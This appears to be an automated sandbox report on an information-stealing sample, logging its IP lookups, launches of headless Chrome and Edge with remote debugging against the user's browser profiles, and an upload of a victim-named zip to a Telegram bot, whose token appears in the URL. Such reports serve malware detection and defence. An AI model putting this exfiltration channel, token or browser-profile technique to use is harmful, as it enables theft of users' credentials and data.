                                                                                                                                                                                                                                2025-01-14 14:47:12 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 14:47:12 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 12
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 901e6b7c8ee0437f-EWR
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3211&min_rtt=1651&rtt_var=1719&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=677&delivery_rate=1768625&cwnd=79&unsent_bytes=0&cid=50aaa5bf771b9732&ts=276&x=0"
                                                                                                                                                                                                                                2025-01-14 14:47:12 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                                Data Ascii: 8.46.123.189


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.1049734104.26.13.2054438044C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2025-01-14 14:47:12 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                2025-01-14 14:47:12 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 14:47:12 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 12
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 901e6b8079fa435b-EWR
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2492&min_rtt=2418&rtt_var=960&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1207609&cwnd=214&unsent_bytes=0&cid=94d2430a5946d346&ts=159&x=0"
                                                                                                                                                                                                                                2025-01-14 14:47:12 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                                Data Ascii: 8.46.123.189


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.2.1049736104.26.13.2054438044C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2025-01-14 14:47:13 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                2025-01-14 14:47:13 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 14:47:13 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 12
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 901e6b876ebe42fb-EWR
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1639&rtt_var=624&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1740166&cwnd=212&unsent_bytes=0&cid=149b647af6f0eb18&ts=138&x=0"
                                                                                                                                                                                                                                2025-01-14 14:47:13 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                                Data Ascii: 8.46.123.189


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                4192.168.2.1049737104.26.13.2054438044C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2025-01-14 14:47:14 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                2025-01-14 14:47:14 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 14:47:14 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 12
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 901e6b8b1dbe7d1e-EWR
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=1957&rtt_var=795&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1492079&cwnd=192&unsent_bytes=0&cid=19a86693d56672d1&ts=136&x=0"
                                                                                                                                                                                                                                2025-01-14 14:47:14 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                                Data Ascii: 8.46.123.189


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                5192.168.2.1049739149.154.167.2204438044C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2025-01-14 14:47:15 UTC211OUTPOST /bot6408760648:AAHZHh7YT7kusTgJi5VULHYIyPQmN5QDENw/sendDocument HTTP/1.1
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary="5ecb3e85-84cd-403b-a726-d9ea4b408d00"
                                                                                                                                                                                                                                Content-Length: 2105
                                                                                                                                                                                                                                2025-01-14 14:47:15 UTC2105OUTData Raw: 2d 2d 35 65 63 62 33 65 38 35 2d 38 34 63 64 2d 34 30 33 62 2d 61 37 32 36 2d 64 39 65 61 34 62 34 30 38 64 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 5f 55 6e 69 74 65 64 20 53 74 61 74 65 73 5f 31 34 30 31 32 30 32 35 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 38 2e 34 36 2e 31 32 33 2e 31 38 39 5f 55 6e 69 74 65 64 25 32 30 53 74 61 74 65 73 5f 31 34 30 31 32 30 32 35 2e 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 e7 4d 2e 5a
                                                                                                                                                                                                                                Data Ascii: --5ecb3e85-84cd-403b-a726-d9ea4b408d00Content-Type: application/octet-streamContent-Disposition: form-data; name=document; filename="8.46.123.189_United States_14012025.zip"; filename*=utf-8''8.46.123.189_United%20States_14012025.zipPKM.Z
                                                                                                                                                                                                                                2025-01-14 14:47:16 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 14:47:16 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 1416
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                2025-01-14 14:47:16 UTC1416INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 38 36 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 34 30 38 37 36 30 36 34 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 74 73 74 65 61 6c 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 54 68 65 5f 48 4b 6f 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 37 32 30 38 38 36 33 31 2c 22 74 69 74 6c 65 22 3a 22 42 4f 54 44 41 54 41 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 38 36 36 30 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b
                                                                                                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":28617,"from":{"id":6408760648,"is_bot":true,"first_name":"Botsteal","username":"The_HKo_Bot"},"chat":{"id":-4572088631,"title":"BOTDATA","type":"group","all_members_are_administrators":true},"date":1736866036,"document":{


                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:09:43:38
                                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                                                                Imagebase:0xdf0000
                                                                                                                                                                                                                                File size:1'620'872 bytes
                                                                                                                                                                                                                                MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                Start time:09:46:39
                                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Documents\example.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff608ac0000
                                                                                                                                                                                                                                File size:39'173'984 bytes
                                                                                                                                                                                                                                MD5 hash:63B58E59519DB03CE6D393681D4442A8
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                Start time:09:46:44
                                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox
                                                                                                                                                                                                                                Imagebase:0x7ff6c5c30000
                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                Start time:09:46:48
                                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1596 --field-trial-handle=1428,i,3801852905394736153,15773183459948505587,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                                Imagebase:0x7ff6c5c30000
                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                Start time:09:46:55
                                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9440 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox
                                                                                                                                                                                                                                Imagebase:0x7ff6a9290000
                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                Start time:09:46:57
                                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1596 --field-trial-handle=1452,i,15901008811036505322,11518475085640953026,262144 --disable-features=PaintHolding /prefetch:3
                                                                                                                                                                                                                                Imagebase:0x7ff6a9290000
                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:09:47:25
                                                                                                                                                                                                                                Start date:14/01/2025
                                                                                                                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                Imagebase:0x7ff7dd440000
                                                                                                                                                                                                                                File size:71'680 bytes
                                                                                                                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                No disassembly